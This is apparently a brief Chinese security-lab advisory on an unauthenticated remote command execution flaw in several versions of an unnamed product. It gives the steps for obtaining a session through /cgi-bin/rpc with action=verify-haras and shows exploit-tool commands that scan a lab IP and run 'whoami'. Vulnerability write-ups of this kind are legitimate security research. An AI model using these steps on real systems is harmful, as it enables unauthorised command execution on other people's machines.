新闻动态
· 11.1.1
· 10.3.0.27372
· 11.0.0.33162
1、 访问扫描开放的端口
2、 需要获取到session,测试目标是否存在/cgi-bin/rpc界面
3、 在/cgi-bin/rpc 中,传入action=verify-haras参数即可在未授权的情况下拿到有效session
4、 使用获取到的session执行系统命令
1、 运行命令得到漏洞端口:xrkRce.exe -h 192.168.16.128 -t scan
2、 执行系统命令:xrkRce.exe -h 192.168.16.128 -t rce -p 49156 -c "whoami"
本文仅限于个人学习和技术研究,由于传播、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为,均由使用者本人负责,本单位不为此承担任何责任。创安攻防实验室拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。
如有侵权,请联系后台。